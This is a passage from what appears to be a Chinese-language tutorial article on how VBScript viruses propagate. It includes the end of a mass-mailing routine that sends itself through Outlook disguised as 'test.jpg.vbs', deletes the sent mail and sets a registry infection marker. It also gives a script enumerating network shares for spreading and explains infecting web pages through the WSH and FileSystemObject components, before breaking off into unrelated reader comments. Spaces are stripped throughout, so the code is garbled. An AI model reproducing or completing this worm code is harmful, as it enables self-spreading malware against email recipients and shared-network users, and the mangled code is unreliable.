item.Body="这里是病毒邮件传播测试,收到此信请不要慌张!"//写入文件内容
SetattachMents=item.Attachments//定义邮件附件
attachMents.AddfileSysObj.GetSpecialFolder(0)&"test.jpg.vbs"
item.DeleteAfterSubmit=True//信件提交后自动删除
Ifitem.To<>""Then
item.Send//发送邮件
shellObj.regwrite"HKCUsoftwareMailtestmailed","1"//病毒标记,以免重复感染
EndIf
Next
EndIf
Next
Endif
EndFunction
2)通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
在VBS中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg="网络连接搜索测试"
SetWSHNetwork=WScript.CreateObject("WScript.Network")'创建一个网络对象
SetoPrinters=WshNetwork.EnumPrinterConnections'创建一个网络打印机连接列表
WScript.Echo"Networkprintermappings:"
Fori=0tooPrinters.Count-1Step2'显示网络打印机连接情况
WScript.Echo"Port"&oPrinters.Item(i)&"="&oPrinters.Item(i+1)
Next
SetcolDrives=WSHNetwork.EnumNetworkDrives'创建一个网络共享连接列表
IfcolDrives.Count=0Then
MsgBox"没有可列出的驱动器。",vbInformation+vbOkOnly,welcome_msg
Else
strMsg="当前网络驱动器连接:"&CRLF
Fori=0TocolDrives.Count-1Step2
strMsg=strMsg&Chr(13)&Chr(10)&colDrives(i)&Chr(9)&colDrives(i+1)
Next
MsgBoxstrMsg,vbInformation+vbOkOnly,welcome_msg'显示当前网络驱动器连接
EndIf
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。
3)通过感染htm、asp、jsp、php等网页文件传播
如今,WWW服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。vbs病毒
病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOTCLSID下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注册表中对它他的说明是“WindowsScriptHostShellObject”,同样,我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注册表对它的说明是“FileSystemObject”,一般先要对COM进行初始化,在获取相应的组件对象之后,病毒便可正确地使用FSO、WSH两个对象,调用它们的强大功能。代码如下所示:
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-26627-3.html
我更了
要会打仗才行
说的好听为了实业为实业你为什么存款利息和贷款利息降低的额度一样真为了实业贷款利息应该多降